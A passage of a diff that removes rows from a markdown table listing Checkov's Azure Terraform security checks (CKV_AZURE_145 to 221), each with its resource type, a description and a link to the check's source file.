-| 1390 | CKV_AZURE_145   | resource | azurerm_function_app_slot                               | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1391 | CKV_AZURE_145   | resource | azurerm_linux_function_app                              | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1392 | CKV_AZURE_145   | resource | azurerm_linux_function_app_slot                         | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1393 | CKV_AZURE_145   | resource | azurerm_windows_function_app                            | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1394 | CKV_AZURE_145   | resource | azurerm_windows_function_app_slot                       | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1395 | CKV_AZURE_146   | resource | azurerm_postgresql_configuration                        | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server                                                                                                                    | Terraform | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py)                                               |
-| 1396 | CKV_AZURE_147   | resource | azurerm_postgresql_server                               | Ensure PostgreSQL is using the latest version of TLS encryption                                                                                                                                          | Terraform | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py)                                                                       |
-| 1397 | CKV_AZURE_148   | resource | azurerm_redis_cache                                     | Ensure Redis Cache is using the latest version of TLS encryption                                                                                                                                         | Terraform | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py)                                                                       |
-| 1398 | CKV_AZURE_149   | resource | azurerm_linux_virtual_machine                           | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                       |
-| 1399 | CKV_AZURE_149   | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                       |
-| 1400 | CKV_AZURE_150   | resource | azurerm_machine_learning_compute_cluster                | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0                                                                                                                                           | Terraform | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py)                                                                     |
-| 1401 | CKV_AZURE_151   | resource | azurerm_windows_virtual_machine                         | Ensure Windows VM enables encryption                                                                                                                                                                     | Terraform | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py)                                                                           |
-| 1402 | CKV_AZURE_152   | resource | azurerm_api_management                                  | Ensure Client Certificates are enforced for API management                                                                                                                                               | Terraform | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py)                                                                 |
-| 1403 | CKV_AZURE_153   | resource | azurerm_app_service_slot                                | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                       |
-| 1404 | CKV_AZURE_153   | resource | azurerm_linux_web_app_slot                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                       |
-| 1405 | CKV_AZURE_153   | resource | azurerm_windows_web_app_slot                            | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                       |
-| 1406 | CKV_AZURE_154   | resource | azurerm_app_service_slot                                | Ensure the App service slot is using the latest version of TLS encryption                                                                                                                                | Terraform | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py)                                                                             |
-| 1407 | CKV_AZURE_155   | resource | azurerm_app_service_slot                                | Ensure debugging is disabled for the App service slot                                                                                                                                                    | Terraform | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py)                                                               |
-| 1408 | CKV_AZURE_156   | resource | azurerm_mssql_database_extended_auditing_policy         | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs                                                                                                    | Terraform | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py)                                                     |
-| 1409 | CKV_AZURE_157   | resource | azurerm_synapse_workspace                               | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                                                                                                                   | Terraform | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py)                                 |
-| 1410 | CKV_AZURE_158   | resource | azurerm_databricks_workspace                            | Ensure that databricks workspace is not public                                                                                                                                                           | Terraform | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py)                                                         |
-| 1411 | CKV_AZURE_159   | resource | azurerm_function_app                                    | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                     |
-| 1412 | CKV_AZURE_159   | resource | azurerm_function_app_slot                               | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                     |
-| 1413 | CKV_AZURE_160   | resource | azurerm_network_security_group                          | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                               |
-| 1414 | CKV_AZURE_160   | resource | azurerm_network_security_rule                           | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                               |
-| 1415 | CKV_AZURE_161   | resource | azurerm_spring_cloud_api_portal                         | Ensures Spring Cloud API Portal is enabled on for HTTPS                                                                                                                                                  | Terraform | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py)                                                           |
-| 1416 | CKV_AZURE_162   | resource | azurerm_spring_cloud_api_portal                         | Ensures Spring Cloud API Portal Public Access Is Disabled                                                                                                                                                | Terraform | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py)                                 |
-| 1417 | CKV_AZURE_163   | resource | azurerm_container_registry                              | Enable vulnerability scanning for container images.                                                                                                                                                      | Terraform | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py)                                                                       |
-| 1418 | CKV_AZURE_164   | resource | azurerm_container_registry                              | Ensures that ACR uses signed/trusted images                                                                                                                                                              | Terraform | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py)                                                                                 |
-| 1419 | CKV_AZURE_165   | resource | azurerm_container_registry                              | Ensure geo-replicated container registries to match multi-region container deployments.                                                                                                                  | Terraform | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py)                                                                                     |
-| 1420 | CKV_AZURE_166   | resource | azurerm_container_registry                              | Ensure container image quarantine, scan, and mark images verified                                                                                                                                        | Terraform | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py)                                                                     |
-| 1421 | CKV_AZURE_167   | resource | azurerm_container_registry                              | Ensure a retention policy is set to cleanup untagged manifests.                                                                                                                                          | Terraform | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py)                                                                     |
-| 1422 | CKV_AZURE_168   | resource | azurerm_kubernetes_cluster                              | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                   |
-| 1423 | CKV_AZURE_168   | resource | azurerm_kubernetes_cluster_node_pool                    | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                   |
-| 1424 | CKV_AZURE_169   | resource | azurerm_kubernetes_cluster                              | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                                                                                                               | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py)                                                                           |
-| 1425 | CKV_AZURE_170   | resource | azurerm_kubernetes_cluster                              | Ensure that AKS use the Paid Sku for its SLA                                                                                                                                                             | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py)                                                                                             |
-| 1426 | CKV_AZURE_171   | resource | azurerm_kubernetes_cluster                              | Ensure AKS cluster upgrade channel is chosen                                                                                                                                                             | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py)                                                                                   |
-| 1427 | CKV_AZURE_172   | resource | azurerm_kubernetes_cluster                              | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                                                                                                                 | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py)                                                                         |
-| 1428 | CKV_AZURE_173   | resource | azurerm_api_management                                  | Ensure API management uses at least TLS 1.2                                                                                                                                                              | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py)                                                                           |
-| 1429 | CKV_AZURE_174   | resource | azurerm_api_management                                  | Ensure API management public access is disabled                                                                                                                                                          | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py)                                                                   |
-| 1430 | CKV_AZURE_175   | resource | azurerm_web_pubsub                                      | Ensure Web PubSub uses a SKU with an SLA                                                                                                                                                                 | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py)                                                                                             |
-| 1431 | CKV_AZURE_176   | resource | azurerm_web_pubsub                                      | Ensure Web PubSub uses managed identities to access Azure resources                                                                                                                                      | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py)                                                                           |
-| 1432 | CKV_AZURE_177   | resource | azurerm_windows_virtual_machine                         | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                           |
-| 1433 | CKV_AZURE_177   | resource | azurerm_windows_virtual_machine_scale_set               | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                           |
-| 1434 | CKV_AZURE_178   | resource | azurerm_linux_virtual_machine                           | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                         |
-| 1435 | CKV_AZURE_178   | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                         |
-| 1436 | CKV_AZURE_179   | resource | azurerm_linux_virtual_machine                           | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1437 | CKV_AZURE_179   | resource | azurerm_linux_virtual_machine_scale_set                 | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1438 | CKV_AZURE_179   | resource | azurerm_windows_virtual_machine                         | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1439 | CKV_AZURE_179   | resource | azurerm_windows_virtual_machine_scale_set               | Ensure VM agent is installed                                                                                                                                                                             | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1440 | CKV_AZURE_180   | resource | azurerm_kusto_cluster                                   | Ensure that data explorer uses Sku with an SLA                                                                                                                                                           | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py)                                                                           |
-| 1441 | CKV_AZURE_181   | resource | azurerm_kusto_cluster                                   | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely.                                                                                                              | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py)                                                               |
-| 1442 | CKV_AZURE_182   | resource | azurerm_virtual_network                                 | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                               |
-| 1443 | CKV_AZURE_182   | resource | azurerm_virtual_network_dns_servers                     | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                               |
-| 1444 | CKV_AZURE_183   | resource | azurerm_virtual_network                                 | Ensure that VNET uses local DNS addresses                                                                                                                                                                | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py)                                                                                             |
-| 1445 | CKV_AZURE_184   | resource | azurerm_app_configuration                               | Ensure 'local_auth_enabled' is set to 'False'                                                                                                                                                            | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py)                                                                                 |
-| 1446 | CKV_AZURE_185   | resource | azurerm_app_configuration                               | Ensure 'Public Access' is not Enabled for App configuration                                                                                                                                              | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py)                                                                           |
-| 1447 | CKV_AZURE_186   | resource | azurerm_app_configuration                               | Ensure App configuration encryption block is set.                                                                                                                                                        | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py)                                                                               |
-| 1448 | CKV_AZURE_187   | resource | azurerm_app_configuration                               | Ensure App configuration purge protection is enabled                                                                                                                                                     | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py)                                                                     |
-| 1449 | CKV_AZURE_188   | resource | azurerm_app_configuration                               | Ensure App configuration Sku is standard                                                                                                                                                                 | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py)                                                                                             |
-| 1450 | CKV_AZURE_189   | resource | azurerm_key_vault                                       | Ensure that Azure Key Vault disables public network access                                                                                                                                               | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py)                                               |
-| 1451 | CKV_AZURE_190   | resource | azurerm_storage_account                                 | Ensure that Storage blobs restrict public access                                                                                                                                                         | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py)                                                       |
-| 1452 | CKV_AZURE_191   | resource | azurerm_eventgrid_topic                                 | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                                                                                                              | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py)                                           |
-| 1453 | CKV_AZURE_192   | resource | azurerm_eventgrid_topic                                 | Ensure that Azure Event Grid Topic local Authentication is disabled                                                                                                                                      | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py)                                                   |
-| 1454 | CKV_AZURE_193   | resource | azurerm_eventgrid_topic                                 | Ensure public network access is disabled for Azure Event Grid Topic                                                                                                                                      | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py)                                                               |
-| 1455 | CKV_AZURE_194   | resource | azurerm_eventgrid_domain                                | Ensure that Managed identity provider is enabled for Azure Event Grid Domain                                                                                                                             | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py)                                         |
-| 1456 | CKV_AZURE_195   | resource | azurerm_eventgrid_domain                                | Ensure that Azure Event Grid Domain local Authentication is disabled                                                                                                                                     | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py)                                                 |
-| 1457 | CKV_AZURE_196   | resource | azurerm_signalr_service                                 | Ensure that SignalR uses a Paid Sku for its SLA                                                                                                                                                          | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py)                                                                                           |
-| 1458 | CKV_AZURE_197   | resource | azurerm_cdn_endpoint                                    | Ensure the Azure CDN disables the HTTP endpoint                                                                                                                                                          | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py)                                                                       |
-| 1459 | CKV_AZURE_198   | resource | azurerm_cdn_endpoint                                    | Ensure the Azure CDN enables the HTTPS endpoint                                                                                                                                                          | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py)                                                                       |
-| 1460 | CKV_AZURE_199   | resource | azurerm_servicebus_namespace                            | Ensure that Azure Service Bus uses double encryption                                                                                                                                                     | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py)                                         |
-| 1461 | CKV_AZURE_200   | resource | azurerm_cdn_endpoint_custom_domain                      | Ensure the Azure CDN endpoint is using the latest version of TLS encryption                                                                                                                              | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py)                                                                                     |
-| 1462 | CKV_AZURE_201   | resource | azurerm_servicebus_namespace                            | Ensure that Azure Service Bus uses a customer-managed key to encrypt data                                                                                                                                | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py)                                                                           |
-| 1463 | CKV_AZURE_202   | resource | azurerm_servicebus_namespace                            | Ensure that Managed identity provider is enabled for Azure Service Bus                                                                                                                                   | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py)                                         |
-| 1464 | CKV_AZURE_203   | resource | azurerm_servicebus_namespace                            | Ensure Azure Service Bus Local Authentication is disabled                                                                                                                                                | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py)                                                     |
-| 1465 | CKV_AZURE_204   | resource | azurerm_servicebus_namespace                            | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus                                                                                                                           | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py)                                               |
-| 1466 | CKV_AZURE_205   | resource | azurerm_servicebus_namespace                            | Ensure Azure Service Bus is using the latest version of TLS encryption                                                                                                                                   | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py)                                                             |
-| 1467 | CKV_AZURE_206   | resource | azurerm_storage_account                                 | Ensure that Storage Accounts use replication                                                                                                                                                             | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py)                                                           |
-| 1468 | CKV_AZURE_207   | resource | azurerm_search_service                                  | Ensure Azure Cognitive Search service uses managed identities to access Azure resources                                                                                                                  | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py)                                                                 |
-| 1469 | CKV_AZURE_208   | resource | azurerm_search_service                                  | Ensure that Azure Cognitive Search maintains SLA for index updates                                                                                                                                       | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py)                                                                               |
-| 1470 | CKV_AZURE_209   | resource | azurerm_search_service                                  | Ensure that Azure Cognitive Search maintains SLA for search index queries                                                                                                                                | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py)                                                                 |
-| 1471 | CKV_AZURE_210   | resource | azurerm_search_service                                  | Ensure Azure Cognitive Search service allowed IPS does not give public Access                                                                                                                            | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py)                                                         |
-| 1472 | CKV_AZURE_211   | resource | azurerm_service_plan                                    | Ensure App Service plan suitable for production use                                                                                                                                                      | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py)                                                                             |
-| 1473 | CKV_AZURE_212   | resource | azurerm_service_plan                                    | Ensure App Service has a minimum number of instances for failover                                                                                                                                        | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py)                                                                   |
-| 1474 | CKV_AZURE_213   | resource | azurerm_app_service                                     | Ensure that App Service configures health check                                                                                                                                                          | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                     |
-| 1475 | CKV_AZURE_213   | resource | azurerm_linux_web_app                                   | Ensure that App Service configures health check                                                                                                                                                          | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                     |
-| 1476 | CKV_AZURE_213   | resource | azurerm_windows_web_app                                 | Ensure that App Service configures health check                                                                                                                                                          | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py)                                                                     |
-| 1477 | CKV_AZURE_214   | resource | azurerm_linux_web_app                                   | Ensure App Service is set to be always on                                                                                                                                                                | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                 |
-| 1478 | CKV_AZURE_214   | resource | azurerm_windows_web_app                                 | Ensure App Service is set to be always on                                                                                                                                                                | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py)                                                                                 |
-| 1479 | CKV_AZURE_215   | resource | azurerm_api_management_backend                          | Ensure API management backend uses https                                                                                                                                                                 | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py)                                                                   |
-| 1480 | CKV_AZURE_216   | resource | azurerm_firewall                                        | Ensure DenyIntelMode is set to Deny for Azure Firewalls                                                                                                                                                  | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py)                                                     |
-| 1481 | CKV_AZURE_217   | resource | azurerm_application_gateway                             | Ensure Azure Application gateways listener that allow connection requests over HTTP                                                                                                                      | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py)                                                                                         |
-| 1482 | CKV_AZURE_218   | resource | azurerm_application_gateway                             | Ensure Application Gateway defines secure protocols for in transit communication                                                                                                                         | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py)                                                               |
-| 1483 | CKV_AZURE_219   | resource | azurerm_firewall                                        | Ensure Firewall defines a firewall policy                                                                                                                                                                | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py)                                                                 |
-| 1484 | CKV_AZURE_220   | resource | azurerm_firewall_policy                                 | Ensure Firewall policy has IDPS mode as deny                                                                                                                                                             | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py)                                                               |
-| 1485 | CKV_AZURE_221   | resource | azurerm_linux_function_app                              | Ensure that Azure Function App public network access is disabled                                                                                                                                         | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py)                                                       |
